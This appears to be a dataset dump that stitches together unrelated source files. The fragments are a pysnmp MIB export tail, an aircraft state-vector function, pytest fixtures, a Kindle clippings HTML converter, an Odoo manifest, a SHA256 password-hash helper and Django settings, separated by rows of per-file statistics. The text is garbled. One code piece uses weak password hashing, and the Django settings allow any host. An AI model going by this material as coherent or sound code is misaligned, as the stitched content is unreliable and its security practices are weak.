f10WredRedReserve1=f10WredRedReserve1, f10WredRedReserve2=f10WredRedReserve2, f10IngMulticastQueueId=f10IngMulticastQueueId, f10EgMulticastYellowDrop=f10EgMulticastYellowDrop, f10InQueueDropPackets=f10InQueueDropPackets, f10OutQueuePackets=f10OutQueuePackets, f10IngUnicastYellowMax=f10IngUnicastYellowMax, f10EgQueueMulticastStatTable=f10EgQueueMulticastStatTable, f10CpuIngUnicastSrcPortPipe=f10CpuIngUnicastSrcPortPipe, f10CpuIngUnicastBytesCount=f10CpuIngUnicastBytesCount, f10InQueuePktsCount=f10InQueuePktsCount, f10IngMulticastSrcPortPipe=f10IngMulticastSrcPortPipe, f10EgUnicastPacketCount=f10EgUnicastPacketCount, f10IngMulticastGreenMin=f10IngMulticastGreenMin, f10EgQueueUnicastStatEntry=f10EgQueueUnicastStatEntry, f10CpuIngUnicastQueueId=f10CpuIngUnicastQueueId, f10MonQueue=f10MonQueue, f10EgMulticastGreenDrop=f10EgMulticastGreenDrop, f10IngUnicastGreenMin=f10IngUnicastGreenMin, f10IngQueueUnicastStatEntry=f10IngQueueUnicastStatEntry, f10IngMulticastBytesCount=f10IngMulticastBytesCount, f10OutQueueBps=f10OutQueueBps, f10IngMulticastSrcCard=f10IngMulticastSrcCard, f10WredYellowName=f10WredYellowName, f10MonMac=f10MonMac, f10WredYellowReserve1=f10WredYellowReserve1, f10InQueueBytes=f10InQueueBytes, f10MonMibVersion=f10MonMibVersion, f10ArpProxySent=f10ArpProxySent, f10ArpReplySent=f10ArpReplySent, f10MacAccOutIfIndex=f10MacAccOutIfIndex, f10BcastPktSent=f10BcastPktSent, f10IngUnicastCycloneVersion=f10IngUnicastCycloneVersion, f10EgUnicastRedDrop=f10EgUnicastRedDrop, f10InQueueStatisticsTable=f10InQueueStatisticsTable, f10WredStatisticsTable=f10WredStatisticsTable, f10OutQueueBytesCount=f10OutQueueBytesCount, f10IngUnicastBytes=f10IngUnicastBytes, f10CpuIngQueueUnicastStatTable=f10CpuIngQueueUnicastStatTable, f10CpuIngUnicastRedDrop=f10CpuIngUnicastRedDrop, f10IngUnicastYellowMin=f10IngUnicastYellowMin, f10InQueueId=f10InQueueId, f10MacAccounting=f10MacAccounting, f10MonIfQueueGroup=f10MonIfQueueGroup, f10ArpReqRecv=f10ArpReqRecv, f10IngMulticastPacketCount=f10IngMulticastPacketCount, f10IngUnicastGreenMax=f10IngUnicastGreenMax, f10IngMulticastYellowDrop=f10IngMulticastYellowDrop, PYSNMP_MODULE_ID=f10MonitoringMib, f10IngMulticastBytes=f10IngMulticastBytes, f10MonMaxQueue=f10MonMaxQueue, f10CpuIngUnicastDestCpu=f10CpuIngUnicastDestCpu, f10WredGreenName=f10WredGreenName, f10CpuIngUnicastYellowDrop=f10CpuIngUnicastYellowDrop, f10CpuIngUnicastGreenMin=f10CpuIngUnicastGreenMin, f10EgMulticastYellowMin=f10EgMulticastYellowMin, f10MonIfQueue=f10MonIfQueue, f10WredRedThresholdHigh=f10WredRedThresholdHigh, f10IngUnicastGreenDrop=f10IngUnicastGreenDrop, f10EgUnicastYellowMax=f10EgUnicastYellowMax, f10EgQueueUnicastStatTable=f10EgQueueUnicastStatTable, f10MacAccountingDestEntry=f10MacAccountingDestEntry, f10WredGreenDropPackets=f10WredGreenDropPackets, f10CpuIngUnicastYellowMax=f10CpuIngUnicastYellowMax, f10WredYellowReserve2=f10WredYellowReserve2, f10EgUnicastYellowDrop=f10EgUnicastYellowDrop, f10MacAccMacAddr=f10MacAccMacAddr, f10MacAccInIfIndex=f10MacAccInIfIndex, f10IpStatistic=f10IpStatistic, f10WredGreenThresholdHigh=f10WredGreenThresholdHigh, f10IngUnicastSrcPortPipe=f10IngUnicastSrcPortPipe, f10McastPktSent=f10McastPktSent, f10EgMulticastGreenMin=f10EgMulticastGreenMin, f10MonitoringMib=f10MonitoringMib, f10MonGroup=f10MonGroup, f10IngUnicastDestCard=f10IngUnicastDestCard, f10IngUnicastDestPortPipe=f10IngUnicastDestPortPipe, f10IngMulticastRedDrop=f10IngMulticastRedDrop, f10EgUnicastYellowMin=f10EgUnicastYellowMin, f10MacGroup=f10MacGroup, f10IngMulticastGreenDrop=f10IngMulticastGreenDrop, f10WredYellowDropPackets=f10WredYellowDropPackets, f10IngUnicastRedDrop=f10IngUnicastRedDrop, f10NetworkStat=f10NetworkStat, f10EgMulticastGreenMax=f10EgMulticastGreenMax, f10EgMulticastBytes=f10EgMulticastBytes, f10WredGreenReserve1=f10WredGreenReserve1, f10IngUnicastYellowDrop=f10IngUnicastYellowDrop, f10ArpReqSent=f10ArpReqSent, f10IngQueueUnicastStatTable=f10IngQueueUnicastStatTable, f10ArpReplyRecv=f10ArpReplyRecv, f10EgMulticastQueueId=f10EgMulticastQueueId, f10WredQueueId=f10WredQueueId, f10IngUnicastBytesCount=f10IngUnicastBytesCount, f10CpuIngUnicastCycloneVersion=f10CpuIngUnicastCycloneVersion, f10WredYellowThresholdHigh=f10WredYellowThresholdHigh, f10McastPktRecv=f10McastPktRecv, f10EgUnicastGreenMin=f10EgUnicastGreenMin, f10OutQueueId=f10OutQueueId, f10IngQueueMulticastStatEntry=f10IngQueueMulticastStatEntry, f10WredGreenReserve2=f10WredGreenReserve2, f10EgUnicastGreenDrop=f10EgUnicastGreenDrop, f10IngMulticastGreenMax=f10IngMulticastGreenMax, f10InQueueMatchPackets=f10InQueueMatchPackets, f10EgUnicastQueueId=f10EgUnicastQueueId, f10OutQueueCycloneVersion=f10OutQueueCycloneVersion, f10WredRedDropPackets=f10WredRedDropPackets, f10MacAccVlan=f10MacAccVlan, f10MacAccountingDestTable=f10MacAccountingDestTable, f10WredRedThresholdLow=f10WredRedThresholdLow, f10EgUnicastBytesCount=f10EgUnicastBytesCount, f10IngUnicastPacketCount=f10IngUnicastPacketCount)
131.044543
6,796
0.791261
6,857
58,839
6.789412
0.062418
0.071915
0.125851
0.012802
0.575298
0.4389
0.391752
0.38084
0.311116
0.282719
0
0.085852
0.095906
58,839
448
6,797
131.337054
0.789307
0.005744
0
0
0
0.138636
0.279748
0.013882
0
0
0
0
0
1
0
false
0.029545
0.020455
0
0.020455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
056887fff4c016e1bd810fe62a7c889a8d65cc5e
1,952
py
Python
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
""" Function : Title : Written by: Email : aarc.88@gmail.com Date : Last edit : Language : Python 3.8 or > Aeronautical Institute of Technology - Airbus Brazil Description: - Inputs: - Outputs: - TODO's: - """ # ============================================================================= # IMPORTS # ============================================================================= import numpy as np # ============================================================================= # CLASSES # ============================================================================= # ============================================================================= # FUNCTIONS # ============================================================================= def state_vector(x, trim_par): X = np.zeros((12, 1)) X[0] = x[0] # V X[1] = x[1] # alpha X[2] = x[2] # q X[3] = x[3] # theta X[4] = trim_par['H_m'] # H X[6] = x[4] # beta X[7] = x[5] # phi X[8] = x[6] # p X[9] = x[7] # r X[10] = x[8] # r return X # ============================================================================= # MAIN # ============================================================================= # ============================================================================= # TEST # ============================================================================= # x = [68.0588, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0] # trim_par = {} # trim_par = {'V':68.0588, # 'H_m':10000, # 'chi_deg':0, # 'gamma_deg':0, # 'phi_dot_deg_s':0, # 'theta_dot_deg':0, # 'psi_dot_deg_s':0, # 'beta_deg_eq':0, # 'W':[0, 0, 0]} # X = state_vector(x, trim_par) # print(X)
22.436782
79
0.236168
164
1,952
2.682927
0.463415
0.063636
0.081818
0.090909
0.115909
0.029545
0.029545
0.029545
0.029545
0.029545
0
0.04577
0.26127
1,952
86
80
22.697674
0.259362
0.798668
0
0
0
0
0.008982
0
0
0
0
0.011628
0
1
0.071429
false
0
0.071429
0
0.214286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
057cd72af1308e0a81b1f8fd12ba9d1678f47b2d
1,262
py
Python
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
176
2017-01-30T16:21:48.000Z
2022-02-10T05:32:57.000Z
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
49
2017-01-21T20:27:03.000Z
2022-01-16T02:57:51.000Z
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
21
2017-01-26T06:08:54.000Z
2022-01-04T19:53:25.000Z
import click import pytest from click.testing import CliRunner @pytest.yield_fixture def pb_api(mocker): from pushbullet_cli import app from tests.mock_pushbullet import MockPushBullet mock_pb = MockPushBullet() mocker.patch.object(app, "_get_pb", return_value=mock_pb) yield mock_pb @pytest.fixture def runner(pb_api): runner = CliRunner() return runner def wrap_runner_func(runner, func): def invoke(arg_list=[], should_raise=True, **kwargs): result = runner.invoke(func, arg_list, **kwargs) if should_raise: if result.exception is not None: raise result.exception assert result.exit_code == 0 return result return invoke @pytest.fixture def push(runner): from pushbullet_cli.app import push return wrap_runner_func(runner, push) @pytest.fixture def list_devices(runner): from pushbullet_cli.app import list_devices return wrap_runner_func(runner, list_devices) @pytest.fixture def list_pushes(runner): from pushbullet_cli.app import list_pushes return wrap_runner_func(runner, list_pushes) @pytest.fixture def set_key(runner): from pushbullet_cli.app import set_key return wrap_runner_func(runner, set_key)
21.033333
61
0.723455
172
1,262
5.081395
0.27907
0.06865
0.097254
0.114416
0.283753
0.224256
0.08238
0
0
0
0
0.000994
0.202853
1,262
59
62
21.389831
0.867793
0
0
0.128205
0
0
0.005547
0
0
0
0
0
0.025641
1
0.205128
false
0
0.230769
0
0.615385
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
0582a1028ca60869856e20d167bdffc0aa95e128
412
py
Python
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
13
2019-10-01T02:51:27.000Z
2022-02-28T17:38:58.000Z
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
2
2020-11-09T09:17:21.000Z
2021-04-27T21:20:59.000Z
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
1
2020-02-28T12:05:22.000Z
2020-02-28T12:05:22.000Z
# -*- coding: utf-8 -*- from .equipment import lt_equipment from .spell import lt_spell_lxy, lt_spell_zle, lt_spell_lyr, lt_spell_an from .monster import lt_monster from .zone import lt_zone doc_data = dict( lt_equipment=lt_equipment, lt_spell_lxy=lt_spell_lxy, lt_spell_zle=lt_spell_zle, lt_spell_lyr=lt_spell_lyr, lt_spell_an=lt_spell_an, lt_monster=lt_monster, lt_zone=lt_zone, )
25.75
72
0.764563
72
412
3.902778
0.236111
0.298932
0.106762
0.128114
0.384342
0.348754
0.298932
0.298932
0
0
0
0.002874
0.15534
412
16
73
25.75
0.804598
0.050971
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.307692
0
0.307692
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
0597da213baf4860aef1103fe9f6eaf312ad6be5
9,246
py
Python
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
1
2020-05-25T11:30:54.000Z
2020-05-25T11:30:54.000Z
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
null
null
null
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
null
null
null
# coding: utf-8 import re import datetime from .feed import read_file __author__ = "Rafał Karoń <rafalkaron@gmail.com>" def clipps_str_to_html_str(clipps_str): """Return a string that contains the converted \"Kindle Clippings.txt file\" to HTML.""" # ADD ELEMENTS (SVG favicon encoded with: https://yoksel.github.io/url-encoder/) pre_elements = r"""<!DOCTYPE html> <html> <head> <title>Kindle Clippings</title> <meta charset="utf-8"> <link href="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8' standalone='no'%3F%3E%3C!-- Created with Inkscape (http://www.inkscape.org/) --%3E%3Csvg xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:cc='http://creativecommons.org/ns%23' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns%23' xmlns:svg='http://www.w3.org/2000/svg' xmlns='http://www.w3.org/2000/svg' xmlns:sodipodi='http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd' xmlns:inkscape='http://www.inkscape.org/namespaces/inkscape' width='1000' height='1000' viewBox='0 0 264.58335 264.58335' version='1.1' id='svg8' inkscape:version='0.92.4 (5da689c313, 2019-01-14)' sodipodi:docname='klipps3.svg' inkscape:export-filename='C:%5CUsers%5Crafal%5CDesktop%5Cklipps3.png' inkscape:export-xdpi='72.000008' inkscape:export-ydpi='72.000008'%3E%3Ctitle id='title3713'%3EKlipps%3C/title%3E%3Cdefs id='defs2' /%3E%3Csodipodi:namedview id='base' pagecolor='%23515151' bordercolor='%23000000' borderopacity='1' inkscape:pageopacity='0.20784314' inkscape:pageshadow='2' inkscape:zoom='0.25' inkscape:cx='30.072603' inkscape:cy='582.33116' inkscape:document-units='px' inkscape:current-layer='layer1' showgrid='false' inkscape:window-width='1842' inkscape:window-height='1057' inkscape:window-x='70' inkscape:window-y='-8' inkscape:window-maximized='1' units='px' inkscape:showpageshadow='false' showborder='true' inkscape:pagecheckerboard='false' showguides='true' inkscape:guide-bbox='true'%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0,1' id='guide3724' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='1,0' id='guide3726' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='79.375005,79.375005' orientation='-0.70710678,0.70710678' id='guide3748' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0.70710678,0.70710678' id='guide3750' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458327,150.45027' orientation='-0.70710678,0.70710678' id='guide3776' inkscape:locked='false' /%3E%3Csodipodi:guide position='150.45027,26.458323' orientation='-0.70710678,0.70710678' id='guide3778' inkscape:locked='false' /%3E%3Csodipodi:guide position='114.13307,238.12501' orientation='0.70710678,0.70710678' id='guide3780' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458335,150.45028' orientation='0.70710678,0.70710678' id='guide3782' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='150.45028,26.458334' orientation='1,0' id='guide3801' inkscape:locked='false' /%3E%3Csodipodi:guide position='238.12501,114.13307' orientation='0,1' id='guide3803' inkscape:locked='false' /%3E%3Csodipodi:guide position='132.29167,114.13307' orientation='-0.70710678,0.70710678' id='guide3806' inkscape:locked='false' /%3E%3Csodipodi:guide position='26.458336,150.45028' orientation='0,1' id='guide3826' inkscape:locked='false' /%3E%3C/sodipodi:namedview%3E%3Cmetadata id='metadata5'%3E%3Crdf:RDF%3E%3Ccc:Work rdf:about=''%3E%3Cdc:format%3Eimage/svg+xml%3C/dc:format%3E%3Cdc:type rdf:resource='http://purl.org/dc/dcmitype/StillImage' /%3E%3Cdc:title%3EKlipps%3C/dc:title%3E%3Cdc:creator%3E%3Ccc:Agent%3E%3Cdc:title%3ERafał Karoń%3C/dc:title%3E%3C/cc:Agent%3E%3C/dc:creator%3E%3C/cc:Work%3E%3C/rdf:RDF%3E%3C/metadata%3E%3Cg inkscape:groupmode='layer' id='layer3' inkscape:label='Background' /%3E%3Cg inkscape:groupmode='layer' id='layer2' inkscape:label='Filling'%3E%3Ccircle style='fill:%23ffffff;stroke-width:0.22826612' id='path3736-9' cx='132.29167' cy='132.29169' r='114.13306' /%3E%3C/g%3E%3Cg inkscape:label='Icon' inkscape:groupmode='layer' id='layer1' transform='translate(0,-32.416632)'%3E%3Cpath style='fill:%23e63946;stroke-width:1.32083833;fill-opacity:1' d='M 431.36914 100 L 100 431.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 431.36914 100 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770' /%3E%3Cpath style='fill:%231d3557;fill-opacity:1;stroke-width:1.32083833' d='M 500 500 L 500 831.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 831.36914 500 L 500 500 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770-4' /%3E%3C/g%3E%3C/svg%3E%0A" rel='icon' type='image/svg'/> </head> <body>""" heading = "<h1>Kindle Clippings</h1>\n<h2>" footer = f"<footer>Generated on {datetime.datetime.now().strftime('%B %d, %Y')} at {datetime.datetime.now().strftime('%I:%M %p')} with <a target=\"_blank\" href=\"https://github.com/rafalkaron/Klipps\">Klipps</a></footer>" post_elements = "</body>\n</html>" html_str = "\n".join((pre_elements, heading, clipps_str, footer, post_elements)) # SEARCH AND REPLACE html_str = re.sub(r"\n\n", "\n", html_str) # Removes empty lines html_str = re.sub(r"==========", "<div class=\"entry\">\n<h2>", html_str) # Replaces Kindle entryies markup with the "entry" class and opens headers 2 html_str = re.sub(r"- .* \| ", "###timestamp### ", html_str) # Removes redundant information from timestamps and adds a tag that is used to optimize RE in the next lines for added_on in re.findall(r"^###timestamp### .*", html_str, re.MULTILINE): # Shortens and wraps timestamps || MAKE THIS GENERIC FOR OTHER LANGUAGES added_on_new = re.sub(r"###timestamp###", "", added_on) # Removes the ###timestamp### tag added_on_new = re.sub(r":\d\d$", "", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 24h timestamps added_on_new = re.sub(r":\d\d PM$", " PM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h PM timestamps added_on_new = re.sub(r":\d\d AM$", " AM", added_on_new, re.MULTILINE) # [Optional] Removes seconds in 12h AM timestamps added_on_new = re.sub(r"^ Added on ", "", added_on_new) # [Optional] Removes the "Added on" timestamp text added_on_new = f"<div class=\"timestamp\">{added_on_new}</div>\n<blockquote>" # Wraps timestamps in timestamp divs and opens a blockquote html_str = re.sub(added_on, added_on_new, html_str) html_str = re.sub(r"<div class=\"timestamp\">", "</h2>\n<div class=\"timestamp\">", html_str) # Closes headers 2 before timestamps html_str = re.sub(r"<div class=\"entry\">\n<h2>\n<footer>", "</blockquote>\n</div>\n<footer>", html_str) # Removes redundant entry divs and headers 2 before the footer html_str = re.sub("<div class=\"entry\">\n<h2>", "</blockquote>\n</div>\n<div class=\"entry\">\n<h2>", html_str) # Closes blockquote and entry div before opening anothe entry div html_str = re.sub(r"</h1>\n<h2>", "</h1>\n<div class=\"entry\">\n<h2>", html_str) # Opens the first element div after return html_str def default_style_html_str(html_str): """Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a default embedded CSS style.""" html_str = re.sub("<h1>", "<div class=\"frontpage\"><h1>", html_str) html_str = re.sub("</h1>", "</h1>\n<div class=\"generator\"><p>Generated with Klipps</p></div>\n</div>", html_str) html_str = re.sub("/>\n</head>", """/> <style> *{ font-family: Helvetica, Arial, sans-serif; font-size: 100%; margin: 0px; } .frontpage{ background-color: #1D3557; height: 100vh; } h1{ font-size: 10vw; text-align: center; padding-top: 15vh; padding-bottom: 20vh; padding-left: 1vh; padding-right: 1vh; color: #F1FAEE; } .generator{ font-size: 3vw; text-align: center; color: #F1FAEE; } .entry{ padding: 4rem 8vw 4rem 8vw; } .entry:nth-child(odd){ background: #F1FAEE; } .entry:nth-child(even){ background: rgb(228, 235, 226); } h2{ font-size: 2.6rem; color: #1D3557; } .timestamp{ font-size: 1.2rem; font-weight: bold; padding-bottom: 1rem; color: #1D3557; } blockquote{ font-size: 1.5rem; text-align: justify; color: #1D3557; } footer{ font-size: 1.5rem; padding: 2rem 1rem 2rem 1rem; background-color: #1D3557; color: #F1FAEE; text-align: center; } a{ color: #E63946; font-weight: bolder; text-decoration: none; } </style> </head>""", html_str) return html_str def custom_style_html_str(css_filepath, html_str): """Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a custom embedded CSS style.""" style = read_file(css_filepath) html_str = re.sub("/>\n</head>", f"/>\n<style>\n{style}\n</style>\n</head>", html_str) return html_str
72.234375
4,532
0.701709
1,429
9,246
4.482155
0.271519
0.037158
0.018267
0.046838
0.343169
0.314442
0.251678
0.196565
0.186261
0.170492
0
0.130032
0.113346
9,246
128
4,533
72.234375
0.651256
0.125784
0
0.153846
0
0.019231
0.802488
0.399502
0
0
0
0
0
1
0.028846
false
0
0.028846
0
0.086538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55333cbb250a399b054018a193b9449274e24d7c
837
py
Python
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
1
2020-03-01T03:04:21.000Z
2020-03-01T03:04:21.000Z
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
null
null
null
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
3
2019-07-29T20:23:16.000Z
2021-01-07T20:51:24.000Z
# Copyright 2017 Artyom Losev # Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr> # License MIT (https://opensource.org/licenses/MIT). { "name": """E-commerce Category Cache""", "summary": """Use this module to greatly accelerate the loading of a page with a large number of product categories""", "category": "Website", "images": ["images/websale_cache.png"], "version": "13.0.1.0.1", "author": "IT-Projects LLC, Artyom Losev", "support": "apps@itpp.dev", "website": "https://www.it-projects.info", "license": "Other OSI approved licence", # MIT "price": 25.00, "currency": "EUR", "depends": ["website_sale", "website", "base_action_rule"], "data": ["views.xml", "data/ir_action_server.xml", "data/base_action_rules.xml"], "installable": False, }
41.85
123
0.658303
107
837
5.074766
0.719626
0.055249
0.051565
0
0
0
0
0
0
0
0
0.025568
0.158901
837
19
124
44.052632
0.745739
0.195938
0
0
0
0
0.681138
0.112275
0
0
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
554e5d74e0feb6600546ab4240369b860c3f874d
492
py
Python
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
import random import string import hashlib def make_salt(): return ''.join(random.choice(string.letters) for x in xrange(5)) # Implement the function valid_pw() that returns True if a user's password # matches its hash. You will need to modify make_pw_hash. def make_pw_hash_with_salt(name, pw, salt): h = hashlib.sha256(name + pw + salt).hexdigest() return '%s|%s' % (h, salt) def make_pw_hash(name, pw): s = make_salt() return make_pw_hash_with_salt(name, pw, s)
23.428571
74
0.707317
83
492
4.012048
0.506024
0.072072
0.12012
0.078078
0.144144
0.144144
0.144144
0
0
0
0
0.009926
0.180894
492
20
75
24.6
0.816377
0.260163
0
0
0
0
0.01385
0
0
0
0
0
0
1
0.272727
false
0
0.272727
0.090909
0.818182
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
55813ead580a9fd9024544a5265e546eab6feb28
3,339
py
Python
mysite/mysite/settings.py
prnake/search_engine_demo
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
3
2020-08-08T04:44:29.000Z
2020-09-10T07:38:11.000Z
mysite/mysite/settings.py
prnake/search_engine_demo
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
null
null
null
mysite/mysite/settings.py
prnake/search_engine_demo
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
null
null
null
import os import environ env = environ.Env( # set casting, default value DEBUG=(bool, False) ) # reading .env file environ.Env.read_env() # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ # False if not in os.environ DEBUG = env('DEBUG') # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = env('SECRET_KEY') ADMIN_EMAIL = str(env('ADMIN_EMAIL')).split(' ') ALLOWED_HOSTS = ['*'] SESSION_COOKIE_SECURE = True SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https') # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', "search.apps.SearchConfig", "scrapy.apps.ScrapyConfig", 'captcha', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'mysite.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', 'django.template.context_processors.media', ], }, }, ] WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/3.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.0/topics/i18n/ LANGUAGE_CODE = 'zh-hans' TIME_ZONE = 'Asia/Shanghai' USE_I18N = True USE_L10N = True USE_TZ = False CSRF_COOKIE_SECURE = False SESSION_COOKIE_SECURE = False MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.0/howto/static-files/ STATIC_URL = '/static/' # Captcha CAPTCHA_IMAGE_SIZE = (80, 28) CAPTCHA_TIMEOUT = 1
24.91791
91
0.692123
364
3,339
6.203297
0.425824
0.08636
0.052702
0.055359
0.184234
0.147476
0.078388
0.065545
0.03543
0
0
0.008321
0.172207
3,339
133
92
25.105263
0.808611
0.210542
0
0
0
0
0.497706
0.414755
0
0
0
0
0
1
0
false
0.060241
0.024096
0
0.024096
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
5583a4b67ff425c68e23ee2615524b5aa7a257d1
591
py
Python
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
null
null
null
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
2
2021-05-28T19:45:17.000Z
2021-11-02T15:49:34.000Z
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
null
null
null
